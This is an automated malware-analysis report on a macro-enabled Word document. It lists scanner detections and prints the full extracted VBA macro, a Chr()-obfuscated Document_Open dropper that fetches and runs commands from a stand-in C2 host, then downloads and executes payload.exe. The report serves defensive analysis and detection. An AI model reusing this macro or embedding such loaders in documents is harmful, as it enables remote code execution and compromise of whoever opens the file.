MALICIOUS
450
Risk Score
Heuristics 10
-
ClamAV: Win.Worm.IFeel-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Worm.IFeel-1
-
VBA project inside OOXML medium 7 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Dim shell As Object -
VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXECVBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.Matched line in script
payloadData = http.ResponseBody -
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
Dim shell As Object -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set fso = CreateObject(Chr(83) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & Chr(105) & Chr(110) & Chr(103) & Chr(46) & Chr(70) & Chr(105) & Chr(108) & Chr(101) & Chr(83) & Chr(121) & Chr(115) & Chr(116) & Chr(101) & Chr(109) & Chr(79) & Chr(98) & Chr(106) & Chr(101) & Chr(99) & Chr(116)) -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Set wmiService = GetObject(Chr(119) & Chr(105) & Chr(110) & Chr(109) & Chr(103) & Chr(109) & Chr(116) & Chr(115) & Chr(58) & Chr(47) & Chr(47) & Chr(46) & Chr(92) & Chr(114) & Chr(111) & Chr(111) & Chr(116) & Chr(92) & Chr(99) & Chr(105) & Chr(109) & Chr(118) & Chr(50)) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_Open() -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas Referenced by macro
- http://schemas.microsoft.com/office/drawing/2014/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexReferenced by macro
- http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
- http://schemas.microsoft.com/office/drawing/2016/inkReferenced by macro
- http://schemas.microsoft.com/office/drawing/2017/model3dReferenced by macro
- http://schemas.microsoft.com/office/2019/extlstReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2012/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2018/wordml/cexReferenced by macro
- http://schemas.microsoft.com/office/word/2016/wordml/cidReferenced by macro
- http://schemas.microsoft.com/office/word/2018/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2023/wordml/word16duReferenced by macro
- http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahashReferenced by macro
- http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlockReferenced by macro
- http://schemas.microsoft.com/office/word/2015/wordml/symexReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
- http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 6156 bytes |
SHA-256: 196ad8570e4ded2ce8ccb88d052b4412c89c8e5c544f5930cb75d163989744da |
|||
|
Detection
ClamAV:
Win.Worm.IFeel-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Dim wmiService As Object
Dim processClass As Object
Dim processMethod As Object
Dim shell As Object
Dim fso As Object
Dim documentsFolder As Object
Dim folder As Object
Dim file As Object
Dim c2Command As String
Dim c2Server As String
Dim http As Object
Dim payloadURL As String
Dim payloadData As String
Dim payloadPath As String
' Set the C2 server URL
c2Server = Chr(104) & Chr(116) & Chr(116) & Chr(112) & Chr(58) & Chr(47) & Chr(47) & Chr(101) & Chr(120) & Chr(97) & Chr(109) & Chr(112) & Chr(108) & Chr(101) & Chr(46) & Chr(99) & Chr(111) & Chr(109) & Chr(47) & Chr(99) & Chr(111) & Chr(109) & Chr(109) & Chr(97) & Chr(110) & Chr(100) & Chr(46) & Chr(116) & Chr(120) & Chr(116)
' Set the payload URL
payloadURL = Chr(104) & Chr(116) & Chr(116) & Chr(112) & Chr(58) & Chr(47) & Chr(47) & Chr(101) & Chr(120) & Chr(97) & Chr(109) & Chr(112) & Chr(108) & Chr(101) & Chr(46) & Chr(99) & Chr(111) & Chr(109) & Chr(47) & Chr(112) & Chr(97) & Chr(121) & Chr(108) & Chr(111) & Chr(97) & Chr(100) & Chr(46) & Chr(101) & Chr(120) & Chr(101)
' Set the path to save the payload
payloadPath = Chr(67) & Chr(58) & Chr(92) & Chr(87) & Chr(105) & Chr(110) & Chr(100) & Chr(111) & Chr(119) & Chr(115) & Chr(92) & Chr(84) & Chr(101) & Chr(109) & Chr(112) & Chr(92) & Chr(112) & Chr(97) & Chr(121) & Chr(108) & Chr(111) & Chr(97) & Chr(100) & Chr(46) & Chr(101) & Chr(120) & Chr(101)
' Create WMI service object
Set wmiService = GetObject(Chr(119) & Chr(105) & Chr(110) & Chr(109) & Chr(103) & Chr(109) & Chr(116) & Chr(115) & Chr(58) & Chr(47) & Chr(47) & Chr(46) & Chr(92) & Chr(114) & Chr(111) & Chr(111) & Chr(116) & Chr(92) & Chr(99) & Chr(105) & Chr(109) & Chr(118) & Chr(50))
Set processClass = wmiService.Get(Chr(87) & Chr(105) & Chr(110) & Chr(51) & Chr(50) & Chr(95) & Chr(80) & Chr(114) & Chr(111) & Chr(99) & Chr(101) & Chr(115) & Chr(115))
Set processMethod = processClass.Methods_(Chr(67) & Chr(114) & Chr(101) & Chr(97) & Chr(116) & Chr(101))
' Execute cmd.exe to demonstrate WMI process creation
processMethod.InParameters.Properties_(Chr(67) & Chr(111) & Chr(109) & Chr(109) & Chr(97) & Chr(110) & Chr(100) & Chr(76) & Chr(105) & Chr(110) & Chr(101)).Value = Chr(99) & Chr(109) & Chr(100) & Chr(46) & Chr(101) & Chr(120) & Chr(101) & Chr(32) & Chr(47) & Chr(99) & Chr(32) & Chr(101) & Chr(99) & Chr(104) & Chr(111) & Chr(32) & Chr(87) & Chr(77) & Chr(73) & Chr(32) & Chr(80) & Chr(114) & Chr(111) & Chr(99) & Chr(101) & Chr(115) & Chr(115) & Chr(32) & Chr(67) & Chr(114) & Chr(101) & Chr(97) & Chr(116) & Chr(101) & Chr(100)
wmiService.ExecMethod Chr(87) & Chr(105) & Chr(110) & Chr(51) & Chr(50) & Chr(95) & Chr(80) & Chr(114) & Chr(111) & Chr(99) & Chr(101) & Chr(115) & Chr(115), Chr(67) & Chr(114) & Chr(101) & Chr(97) & Chr(116) & Chr(101), processMethod.InParameters
' Create FileSystemObject to search for documents
Set fso = CreateObject(Chr(83) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & Chr(105) & Chr(110) & Chr(103) & Chr(46) & Chr(70) & Chr(105) & Chr(108) & Chr(101) & Chr(83) & Chr(121) & Chr(115) & Chr(116) & Chr(101) & Chr(109) & Chr(79) & Chr(98) & Chr(106) & Chr(101) & Chr(99) & Chr(116))
Set documentsFolder = fso.GetSpecialFolder(2) ' 2 = Documents folder
Set folder = fso.GetFolder(documentsFolder.Path)
' Search for .pdf and .docx files
For Each file In folder.Files
If LCase(fso.GetExtensionName(file.Name)) = Chr(112) & Chr(100) & Chr(102) Or LCase(fso.GetExtensionName(file.Name)) = Chr(100) & Chr(111) & Chr(99) & Chr(120) Then
' Perform actions on discovered files (e.g., exfiltrate data)
' For demonstration, we'll just echo the file name
Set shell = CreateObject(Chr(87) & Chr(83) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & Chr(46) & Chr(83) & Chr(104) & Chr(101) & Chr(108) & Chr(108))
shell.Run Chr(99) & Chr(109) & Chr(100) & Chr(46) & Chr(101) & Chr(120) & Chr(101) & Chr(32) & Chr(47) & Chr(99) & Chr(32) & Chr(101) & Chr(99) & Chr(104) & Chr(111) & Chr(32) & Chr(68) & Chr(105) & Chr(115) & Chr(99) & Chr(111) & Chr(118) & Chr(101) & Chr(114) & Chr(101) & Chr(100) & Chr(32) & Chr(102) & Chr(105) & Chr(108) & Chr(101) & Chr(58) & Chr(32) & file.Name, 0, True
End If
Next file
' Fetch command from C2 server
Set http = CreateObject(Chr(77) & Chr(83) & Chr(88) & Chr(77) & Chr(76) & Chr(50) & Chr(46) & Chr(88) & Chr(77) & Chr(76) & Chr(72) & Chr(84))
http.Open Chr(71) & Chr(69) & Chr(84), c2Server, False
http.Send
c2Command = http.ResponseText
' Execute the command received from C2 server
If c2Command <> "" Then
Set shell = CreateObject(Chr(87) & Chr(83) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & Chr(46) & Chr(83) & Chr(104) & Chr(101) & Chr(108) & Chr(108))
shell.Run c2Command, 0, True
End If
' Download payload from C2 server
http.Open Chr(71) & Chr(69) & Chr(84), payloadURL, False
http.Send
payloadData = http.ResponseBody
' Save payload to disk
Dim adTypeBinary As Integer
adTypeBinary = 1
Dim stream As Object
Set stream = CreateObject(Chr(65) & Chr(68) & Chr(79) & Chr(66) & Chr(46) & Chr(83) & Chr(116) & Chr(114) & Chr(101) & Chr(97) & Chr(109))
stream.Type = adTypeBinary
stream.Open
stream.Write payloadData
stream.SaveToFile payloadPath, 2 ' 2 = overwrite
' Execute the downloaded payload
Set shell = CreateObject(Chr(87) & Chr(83) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & Chr(46) & Chr(83) & Chr(104) & Chr(101) & Chr(108) & Chr(108))
shell.Run payloadPath, 0, True
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 16384 bytes |
SHA-256: 16d5a6ae731c9a7226fb568fe58d477e87815bd4ffd678f55e6d3729bb263676 |
|||
|
Detection
ClamAV:
Win.Worm.IFeel-1
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.